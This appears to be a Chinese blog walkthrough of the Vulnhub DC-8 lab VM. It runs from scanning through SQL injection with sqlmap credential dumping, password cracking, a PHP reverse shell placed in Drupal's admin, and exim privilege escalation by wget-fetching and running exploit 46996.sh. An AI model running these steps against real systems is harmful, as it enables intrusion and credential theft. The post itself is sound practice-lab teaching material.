【Vulnhub系列】Vulnhub_DC-8靶场渗透(原创)

最新推荐文章于 2024-08-22 19:51:07 发布
最新推荐文章于 2024-08-22 19:51:07 发布
阅读量857 收藏 20
点赞数 18
分类专栏: Vulnhub系列 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70142722/article/details/140723756
版权

【Vulnhub系列靶场】Vulnhub_DC-8靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境配置

从百度网盘下载

image-20240203171154383

在vm中【打开】,并选择位置,可以不用输入名称

image-20240203171250363

image-20240203171325101

打开靶机运行之后,更改网络适配器为NAT即可。

image-20240203171434414

二、信息收集

1、主机发现

image-20240203171629450

2、端口扫描

1、可以先用-F 参数进行粗略的快速探测

image-20240203171939947

2、之后再进行精细探测

nmap.exe -sT --min-rate 10000 -p- 192.168.31.58		#以最小10000速率进行TCP全端口扫描
nmap.exe -sU --min-rate 10000 -p- 192.168.31.58		#以最小10000速率进行UDP全端口扫描

image-20240203173646700

image-20240203173308040

只有TCP开放了22、80端口。

3、用默认脚本对开放的22、80端口在进行全扫描

nmap.exe -sT -sV -sC -O -p22,80 192.168.31.58

image-20240203174215473

确认是一个linux操作系统。

4、用漏洞脚本对开放端口进行漏洞探测

nmap.exe --script=vuln -p22,80 192.168.31.58

image-20240203174154877

并未发现有用的漏洞,只进行了一些目录探测

3、web漏洞探测

访问一下web目录

image-20240203172515316

在kali中用whatweb 识别web框架

image-20240203172733990

有关Drupal 7 的相关漏洞有很多现成的利用方式,可用searchsploit 进行搜索。

searchsploit.cmd Drupal 7

image-20240203172935465

但是利用方式分具体的版本信息,我们暂时还不知道版本的信息。

4、web目录探测

dirsearch.cmd -u http://192.168.31.58 -x 404,403	#过滤掉404,403的响应

image-20240203174337667

三、获取shell立足点

1、查看敏感目录文件

1、robots.txt文件:并没有太多有用的信息,只给了一些目录及文件。

image-20240203174733596

2、install.php文件:看名字是一个安装文件,有重装网站的风险,但是依然无用。

提示要么在数据库中删除现有的数据库信息,要么在settings.php 文件中重新配置成新的数据库。

image-20240203174944771

3、web.config文件:在源代码中看到在首页index.php文件有一个q的参数接口。

image-20240203175425156

image-20240203175515852

image-20240203175532328

在几次的尝试之后发现是一个指路的参数。

4、xmlrpc.php文件:一个奇怪的文件名,查看是一个xml-rpc服务,且需要post提交

image-20240203180428347

用HackBar 简单的进行一个post提交,提示格式不正确,感觉可能存在xml注入。

image-20240203180522820

上网搜索有关xml-rpc服务相关的漏洞,确实有很多相关漏洞,后面可以再自行研究。

2、发现SQL注入

我们点击左侧一篇文章之后,发现上方有一个有一个参数nid

image-20240203182054064

在加上一个单引号’ 之后出现报错,SQL注入的典型特征

image-20240203182157797

为了加快速度,我们直接用sqlmap 去跑,很快出现了结果

 sqlmap.cmd -u "http://192.168.31.58/?nid=1" --batch

image-20240203182330160

之后一步步去爆破数据。

sqlmap.cmd -u "http://192.168.31.58/?nid=1" --batch -D d7db -T users -C uid,main,name,pass --dump

image-20240203185524761

爆破出来两个账户,密码经过了加密。

3、登录后台

将账号密码保存下来,用john 破解工具破解账号密码。

image-20240203190028515

john账号的密码很快就能破解出来

image-20240203190132333

那我们先登录john 的账号(在之前的web目录扫描中知道登录的后台地址/user/login)

image-20240203190525466

成功登录后台。

4、反弹shell

在Drupal 后台中有一个可以执行php代码的地方,是这个框架的一个必须的检测点。

在如下的这个地方:

image-20240203190705884

如下切换成php代码。是一个提交意见之后的感谢语。

image-20240203190749203

在我们的shell反弹网站中找一个phpshell反弹的代码,粘贴上去后在下方保存,并监听本地的4444端口。

image-20240203190947064

image-20240203191049849

之后返回,去写一个意见提交,拿到shell。

image-20240203191205010

这里如果失败可以多试几次,退出登录、刷新页面等(最好在一个页面上操作)

image-20240203192429966

四、提权至root

1、查找SUID文件

find / -perm -u=s -type f 2>/dev/null

image-20240203192842506

可以看到exim4,低版本的exim4是可以提权的。

查看exim4的版本信息:4.89确认在可提权的版本范围内。

exim4 --version

image-20240203193259469

2、exim4提权

1、查找可本地提权脚本:

searchsploit.cmd exim 4 | findstr Local		#通过findstr Local进行筛选

image-20240203193518182

2、查看脚本的利用方式

我们可以在右侧找到searchsploit这个工具,双击进去它的目录,找到这个脚本并复制出来。

image-20240204142529937

image-20240204142649690

进行复制

cp exploits/linux/local/46996.sh /c/Users/Administrator/Desktop/test/

image-20240204142735747

回到windows中用sublime来打开该脚本

image-20240203193852694

3、解析该脚本

如果不懂sh脚本的代码,可以直接让gpt进行分析

image-20240203194141404

简而言之,该脚本有两个利用方法

./46996.sh -m setuid
./46996.sh -m netcat

3、提权至root

1、将该脚本上传至靶机,本地开启http服务

python3 -m http.server

2、在靶机的/tmp 目录下进行下载,/tmp目录任何人都有下载执行权限

wget http://192.168.31.50:8000/46996.sh

image-20240203194428286

3、给该脚本执行权限

chmod +x 46996.sh

4、执行提权

./46996.sh -m netcat	#提权成功
shell=/bin/bash script -q /dev/null	#进入交互shell

image-20240203194645289

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

京落尘
关注
  • 18
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
安全vulnub靶机DARKHOLE: 1
qq_43017750的博客
01-20 4170
DARKHOLE: 1 About Release Back to the Top Name: DarkHole: 1 Date release: 18 Jul 2021 Author: Jehad Alqurashi Series: DarkHole Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that a
教你怎么用Vulnhub来搭建环境
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
mac os 搭建vulhub
王富贵同学的博客
05-09 831
vulhub的安装与简单使用
西部壮仔的博客
03-19 1万+
介绍 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 安装docker和docker-compose后即可开始使用vulhub: 安装docker 环境: ubuntu18.04 apt install docker.io snap install docker...
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
vulnub-dc-1
qq_45414878的博客
06-01 384
vulnub-dc-1nmapdurpalCMSMetasploit nmap 链接: https://www.vulnhub.com/entry/dc-1,292/. 用nmap扫描局域网内存活的主机,发现靶机的ip nmap 192.168.88.0/24 -T4 用nmap进行更加详细的扫描,发现靶机开了以下的几个端口 nmap 192.168.88.137 -T4 -A -sV -p- durpalCMS 端口:22 ——>爆破 ——>未成功 hydra -l root -
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8407
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数采网关面临的安全挑战
编程之道在明明德在亲民在止于至善
08-22 226
数采网关面临的安全挑战
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
weixin_71529930的博客
08-22 415
本节案例适用于不能获得域控密码和hash的情况。
92.WEB渗透测试-信息收集-Google语法(6)
最新发布
计算机王的博客
08-22 136
web渗透测试
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
rolt的专栏
08-19 929
好,我们看,首先,电源管理这里,有两个状态
华为账号“一键登录”能力让美团用户尽享安全便捷的登录体验
HarmonyOS SDK闭源开放能力技术团队
08-19 601
3.将获取到的匿名手机号设置给下面PreviewLoginButtonPage示例代码中的quickLoginAnonymousPhone变量,调用LoginWithHuaweiIDButton组件,实现应用自己的登录页面,并展示华为账号一键登录按钮和华为账号用户认证协议(Account Kit提供跳转链接,应用需实现协议跳转,参见约束与限制第2点),用户同意协议并点击一键登录按钮后,可获取到Authorization Code,将该值传给应用服务器用于获取用户信息(完整手机号、UnionID)。
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 768
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
远程访问安全:rsync、ProFTPD、OpenSSH和VNC漏洞分析
2301_80064376的博客
08-15 2076
ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值